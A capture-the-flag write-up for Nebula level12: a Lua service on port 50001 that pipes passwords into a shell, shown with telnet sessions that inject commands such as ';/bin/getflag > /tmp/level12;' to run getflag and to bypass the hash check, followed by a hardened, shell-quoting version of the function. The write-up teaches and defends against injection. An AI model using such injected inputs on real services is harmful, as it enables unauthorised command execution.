There is a backdoor process listening on port 50001.
```lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
    prog = io.popen("echo "..password.." | sha1sum", "r")
    data = prog:read("*all")
    prog:close()

    data = string.sub(data, 1, 40)

    return data
end

while 1 do
    local client = server:accept()
    client:send("Password: ")
    client:settimeout(60)
    local line, err = client:receive()
    if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)

        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
            client:send("Better luck next time\n");
        else
            client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
    end

    client:close()
end
```
My experience with Lua is minimal at best, but it’s pretty obvious that the hash() function calls a shell command, and allows for command injection.
Running getflag is very simple:

```
level12@nebula:~$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 1;/bin/getflag > /tmp/level12;echo 1
Better luck next time
Connection closed by foreign host.
level12@nebula:~$ cat /tmp/level12
You have successfully executed getflag on a target account
```
And if you want to pass the check for the hash for fun, it is also simple:
```
level12@nebula:~$ telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 4754a4f4bd5787accd33de887b9250a0691dd198;echo 1
Congrats, your token is 413**CARRIER LOST**
Connection closed by foreign host.
```
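For comparison, a hardened variant of `hash()` that passes the password to the shell as a single quoted word, so both inputs shown above are hashed as data instead of being interpreted. This is an added example, not part of the original level; `shell_quote` is a hypothetical helper, and the code assumes a POSIX shell with `printf` and `sha1sum` available.

```lua
-- Added example: hardened variant of hash(), not part of the original level.
-- Assumes a POSIX shell with printf and sha1sum, as on the Nebula VM.

-- Wrap s as one single-quoted shell word; each embedded ' becomes '\''.
local function shell_quote(s)
    return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

-- Same contract as the original hash(): SHA-1 hex of the password plus newline.
local function hash(password)
    -- A NUL byte would truncate the C command string, so refuse it outright.
    if password:find("\0", 1, true) then
        return nil, "invalid input"
    end
    -- printf '%s\n' emits the argument verbatim, with the newline echo added.
    local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
    local prog = assert(io.popen(cmd, "r"))
    local data = prog:read("*a")
    prog:close()
    -- Accept only a well-formed 40-digit hex digest at the start of the output.
    local digest = data:match("^(%x+)")
    if not digest or #digest ~= 40 then
        return nil, "unexpected sha1sum output"
    end
    return digest
end

-- Constructed checks: metacharacters from the page's inputs are now plain data.
local target = "4754a4f4bd5787accd33de887b9250a0691dd198"
assert(shell_quote("a'b") == "'a'\\''b'")
assert(hash(target .. ";echo 1") ~= target) -- digest is no longer echoed back
assert(#hash("it's") == 40)                 -- embedded quote is hashed, not parsed
print("ok")
```

Computing the digest in-process with a SHA-1 library removes the shell entirely and is the stronger fix where such a library is available.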